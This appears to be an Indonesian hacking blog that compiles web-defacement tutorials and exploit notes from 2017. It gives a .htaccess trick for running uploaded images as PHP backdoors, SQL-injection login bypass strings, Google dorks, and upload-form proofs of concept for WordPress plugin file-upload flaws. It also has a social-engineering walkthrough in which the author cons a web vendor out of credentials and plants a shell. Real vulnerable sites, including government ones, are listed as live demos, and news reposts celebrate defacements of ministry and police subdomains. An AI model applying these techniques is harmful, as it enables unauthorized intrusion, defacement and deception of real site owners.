Popular Post

Popular Posts

Recent post

Halo , dipostingan kali ini saya ingin berbagi tentang bagaimana teknik ampuh saat tidak bisa upload backdoor.
Saat kita sudah menemukan sebuah web yang bisa upload file ternyata web tersebut tidak bisa upload file backdoor yang berektensi kan .php, lalu bagaimana caranya kita upload file backdoor kita ? setelah di coba bypass ekstensi .php , phptml , php5 , php.jpg dan lain-lain ternyata gak bisa juga.
Cara nya sangat simple Upload file .htaccess yang bisa sulap :v file .txt , jpg di baca oleh web server menjadi file php
AddType application/x-httpd-php .shor7cut
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
nah kalau sudah terupload , silahkan upload file .jpg , png atau pun .txt

Sumber : https://forum.surabayablackhat.org/d/154-teknik-ampuh-saat-tidak-bisa-upload-backdoor

Teknik ampuh saat tidak bisa upload backdoor

Senin, 19 Juni 2017
Tag : ,

Ada beberapa macam bypass shell upload yg dapat kita gunakan ketika kita akan mengeksekusi suatu web, dan ini beberapa tehnik yang saya ketahui
  • Exif
  • Tamper data
  • Live HTTP Header
  • ImageTragick
  • BurpSuite
  • Upload .htaccess (penambahan fitur php pada ext baru) > upload shell
dan ini beberapa ext yang bisa di pakai untuk bypass: https://raw.githubusercontent.com/cyberserkers/Bypass/master/Shell%20ext.txt

Grets : azzatssins

Trik Bypass Upload Shell/Backdoor

Tag : ,
alat tempur:
1.dork
2.kopi
3.sabar
4.file bergambar jpg , png dll
oke pertama masukan dork : index of jbimages/ or Index of /jbimages site:desa.id
next cari tulisan dialog-v4.htm *note kalau file di upload selain tulisan sukses brati g vuln oke lanjut
oke upload file bergambar nya *note file selain bergambar , tidak bisa di upload oke next
nah, complete kan sekarang kita harus  mencari dimana letak file gambar kita yg kita upload tadi, biasanya di assets/images/ xD *note : dir gambar setiap web berbeda beda jadi berpikir sedikit untuk mencari file bergambar kita xD
 
 
Sumber : http://www.jatim4u.com/2017/04/cara-deface-dengan-poc-jbimages.html

JBimages Aplikasi Sistem Informasi Desa (SID)

Tag :
Halo ini adalah post pertama saya di website ini,perkenalkan nama saya putra A.K.A SPEEDY-03 hehehe,kali ini saya akan membagikan tutorial social engineering (SOCENG),apa sih itu soceng?Social engineering adalah manipulasi psikologis dari seseorang dalam melakukan aksi atau menguak suatu informasi rahasia. �Social engineering mengkonsentrasikan diri pada rantai terlemah sistem jaringan komputer, yaitu manusia. Tidak ada sistem komputer yang tidak melibatkan interaksi manusia. < wikipedia
baiklah soceng model kami itu berbeda dengan yang lain karena saya mencari salah satu jasa pembuat website dahulu lalu mulai soceng,oke langsung saja simak percakapan saya dengan costumer chat,disini saya menggunakan nama palsu dengan Suryanto
*MARI MULAI SOCENG
saya:permisi??
costumer:halo selamat datang ada yang bisa kami bantu?
saya:pak apakah disini menyediakan layanan website untuk berbisnis online?
costumer: iya ada pak.
*DISINI GUA NANYAIN HARGA BIAR COSTUMER ITU GAK CURIGA.

*dan disini gua minta demo salah satu websitenya


dan lanjut
saya:kok indowebplus jadi ke sidoarjo pak? NB:SAYA PURA PURA BINGUNG BIAR TIDAK DI CURIGAI
costumer:Untuk sidoarjo web adalah salah satu website kami pak.Salah satu grup perusahaan kami.
*SAYA DISINI MINTA DEMO LOGINNYA

KWOAKWOA BELUM APA APA UDAH DIKASIH USERNAME SAMA PASSWORD
saya:mana websitenya pak? < maksudnya demo login websitenya

*AND GOTCHA.DISINI SAYA LANTAS KAGET KARENA SAYA DIBERIKAN AKSES USERNAME DAN PASSWORD DARI PEMBUAT JASA WEBSITE TADI
*DAN SAYA LOGIN DAN SAYA UPLOAD SHELLNYA HEHEHE

AND GOTCHA KWKWKW
*HASILNYA
https://sidoarjoweb.com/galo.htm
https://nusantaraperdana.co.id/galo.htm
https://insindo.net/galo.htm
SEBELUMNYA SAYA MINTA MAAF KALO TUTORIAL INI BELUM JELAS ATAU ACAK ACAKAN KWKWK BYEEEE�
MIRRORNYA KWKW
https://defacer.id/archive/attacker/speedy-03


Sumber : https://blog.speedy-id.net/2017/06/18/tutorial-social-engineering-soceng/

Tutorial Social Engineering (SOCENG)

Tag :
Halo gan welcome back with me speedy-03,Kali ini gua akan share tutorial deface yaitu chat manager hehehe,metode ini sangat mudah simpel bagi orang noob kaya saya.
OKE LETS DO IT
  • Pertama kalian pergi ke website https://ipuipuweb.com/ lalu klik chattingan di bawah button (Hubungi Kami,Chat Online,DSB)
  • Setelah kalian klik kalian gambar kaya kawat gitu mungkin gua gak tau :v nih gambarnya
  • Setelah itu kalian upload script deface dengan extensi .htm
  • Dan kalian klik file kalian yang ada di chat tersebut�.dan tara hasilnya �
HASIL DEFACE SAYA


sumber : https://blog.speedy-id.net/2017/06/18/cara-deface-dengan-chat-manager/

Cara Deface Dengan Chat Manager

Minggu, 18 Juni 2017
Tag :
#Vendor : CyberAktif
#
#Google Dork : intext:"Copyright � Element Ajans"
#
#Id : '=' 'or'
#
#PassWord : '=' 'or'
#
#Admin Panel : www.localhost.com.tr/admin/login.php
#
#
#Special Thanks :
#Deadly-Warrior

Element Ajans Admin Panel ByPass Vuln

Sabtu, 17 Juni 2017
Tag :
# Exploit Title: EasyWebEditor 8.6 - Authentication Bypass
# Google Dork: inurl:ewt_news.php?nid=
# Date: 2017-06-16
# Exploit Author: Mersad Security Research
# Software Link: -
# Version: All Version
# Tested on: Kali Liunx
--------------------------------------
Exploit:/ewtadmin

http://127.0.0.1/ewtadmin
-------------------------------------
Live Demo:
http://203.150.225.0/ewtadmin/
http://www.ilovethaiculture.com/ewtadmin/
http://www.dmr.go.th/ewtadmin/
-------------------------------------
# Discovered By: Sh4dow (BlackPentester@Gmail.Com)
# We Are:Mersad (Mersad - Gray Industry)
# https://telegram.me/MersadGroup
# Mersad@Protonmail.Com

NB : ini poc bisa di pake sql / bypass admin

EasyWebEditor 8.6 Authentication Bypass

Jumat, 16 Juni 2017
Tag :
Vendor:www.indexdream.com
Go To Google Search :intext:"Dise�o INDEX Dream"
Enter To The Target
Admin Panel:htm/administrador.php
User: '=' 'or'
Password: '=' 'or'
Demo:
http://www.tramitesuvisa.co/htm/administrador.php
http://www.cootraesturz.com/htm/administrador.php
Upload Image Demo:
http://www.cootraesturz.com/imagenes/home/1.jpg

Diseno INDEX Dream Upload Bypass

Tag :
# Exploit Title: SAUDI SOFTECH Admin Login Page Bypass | Upload shell access
# Google Dork : intext:"Designed By: SAUDI SOFTECH (MST)"
# Date:2017-06-14
# Discovered By: Ormazd
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Version: all
# Tested on : Win 10
##########################
## DP ##
Install NoRedirect Plugin to FireFox
Add your target url to NoRedirect plugin and pervent Redirect
than you can use :
target.com/panel/users.php ---> to add or remove or edit user
target.com/panel/pages.php ---> to add or remove or edit pages
target.com/panel/file.php ---> to add or remove or edit files ( you can upload shell :D )
############################


Demo:
http://www.und-ksa.com/panel/
http://www.madicc.org/panel/
http://www.tisco.com.sa/panel/
http://www.speetech.net/panel/
...

#############################

#Thanks to : MR.Khatar ||Turk-Khan || Blackwolf_Iran ||ll_azab-siyah_ll ||Sh@d0w ||Hellish_PN (mamad khodesh) ||Shdmehr ||

And All Of Iranian Anonymous .

SAUDI SOFTECH Admin Login Page Bypass | Upload shell access

Kamis, 15 Juni 2017
Tag : ,

# Exploit Title: WordPress Plugins WP Checkout - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/wp-checkout
# Date: 13 June 2017
# Exploit Author: x0id
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/wp-checkout
Index of /wp-content/plugins/wp-checkout/

2) Exploit the websites
https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Result file access.
https://localhost/wp-content/uploads/wp-checkout/uploadify/random-file.html

Indonesian h4x0r.

WordPress Plugins WP Checkout - Arbitrary File Upload

Selasa, 13 Juni 2017
Tag :

# Exploit Title: WordPress Plugins Viral Optins - Arbitrary File Upload
# Exploit Author: x0id
# Date: 13 June 2017
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/viral-optins/

2) Exploit the websites
https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Result file access.
https://localhost/wp-content/uploads/YYYY/MM/your-file.php

Indonesian h4x0r.

WordPress Plugins Viral Optins - Arbitrary File Upload

Tag :
Subdomain Kementerian Kesehatan Di Hack � Mungkin karena ingin melampiaskan kekecewaan gara gara ditikung teman sendiri, hacker dengan kodenama E7b_404 meretas subdomian situs Kementerian Kesehatan. Setidaknya, ada tiga subdomain Kemkes yang berubah tampilan.
Subdomain Kementerian Kesehatan Di Hack
Berikut daftar subdomain Kementerian Kesehatan yang berhasil diretas atau dideface oleh pelaku :
  • http://sehat-jiwa.kemkes.go.id/clients/
  • http://tradkom.kemkes.go.id/wp-content/
  • http://kesga.kemkes.go.id/images/
Ada pesan unik yang disampaikan oleh pelaku dan ditujukan kepada Kementerian Kesehatan. berikut isi lengkapnya :
Hallo Pak Kementerian Kesehatan
Hati Saya Sedang Tidak Sehat (Galau) Karena Teman Saya Menikung Saya Dari Belakang
Berikan Saya Kesehatan Untuk Mengobati Hati Saya Yang Terluka Ini

Tak Banyak Yang Dapat Aku Lakukan Selain Melihat Apa Yang Telah Aku Perjuangkan Selama Ini Sia Sia
Selain itu pelaku juga meninggalkan email yang bisa dihubungi di alamat sulispurnama55@gmail.com .
Selain itu beberapa nick lain juga terpampang yang sepertinya teman dari pelaku.
Yukinoshita47, _Tuan2Fay_, Lyonc, Snooze, Anazvr, Loyo-ID
Sampai berita ini dirilis, belum ada perbaikan dari situs terkait. Namun mirror dari ketiga subdomain Kementerian Kesehatan yang di hack bisa kalian lihat disini :
  • http://mirror-h.org/browse/792035/
  • https://defacer.id/archive/mirror/378958
  • https://defacer.id/archive/mirror/378959
Sekian berita sore hari ini, dan selamat menjalankan ibadah puasa.

sumber : https://news.linuxsec.org/situs-kementerian-kesehatan-dihack/

Galau Ditikung Teman Sendiri, Hacker ini Sambangi Situs Kementerian Kesehatan

Tag :
Hacker Tantang Polisi Cyber � beberapa waktu lalu Bareskrim Polri menangkap pelaku peretasan situs Dewan Pers. Anehnya bukan merasa takut, hacker dengan kodenama mirav dan SPEEDY-03 malah meretas tujuh subdomain milik Kepolisian RI dan meninggalkan pesan yang terkesan menantang polisi cyber.
hacker tantang polisi cyber
Berikut list subdomain Polri yang diretas oleh pelaku :
  • http://ntb.sipp.polri.go.id/personel/
  • http://jabar.sisbinkar.polri.go.id/personel/photo/
  • http://kalsel.sisbinkar.polri.go.id/personel/
  • http://kalsel.sipp.polri.go.id/personel/
  • http://bareskrim.sipp.polri.go.id/personel/
Selain subdomain Polri diatas, pelaku juga meretas situs Polda Kepri di alamat http://kepri.sisbinkar.net/personel/ dan situs Polda Sulteng di alamat https://www.binkarsulteng.com/ .
Berikut pesan yang ditinggalkan oleh pelaku :
hacked by mirav w/ SPEEDY-03
Ice-cream-ren-mikulacur
contact : dirin@polri.go.id
police cyber ? i think that is bullshit #SAVEINDONESIA
Selain itu di halaman situs yang diretas juga nampak gambar burung garuda berwarna merah dan backsound Gugur Bunga. Dari pesan yang ditinggalkan kemungkinan tindakan ini berkaitan dengan kasus penangkapan M2404 beberapa waktu lalu.
Sampai berita ini diturunkan situs situs yang diretas belum diperbaiki.

sumber : https://news.linuxsec.org/2017/06/hacker-tantang-polisi-cyber.html

Retas Subdomain Polri, Hacker ini Tantang Polisi Cyber

Minggu, 11 Juni 2017
Tag :
Navigation

Weekly most viewed

Blogroll

Cari Blog Ini

Arsip Blog

Recent in Sports

Comments

Social

Random Posts

Recent

Header Ads

- Copyright © Social-net7sec - Devil Survivor 2 - Powered by Blogger - Designed by Johanes Djogan -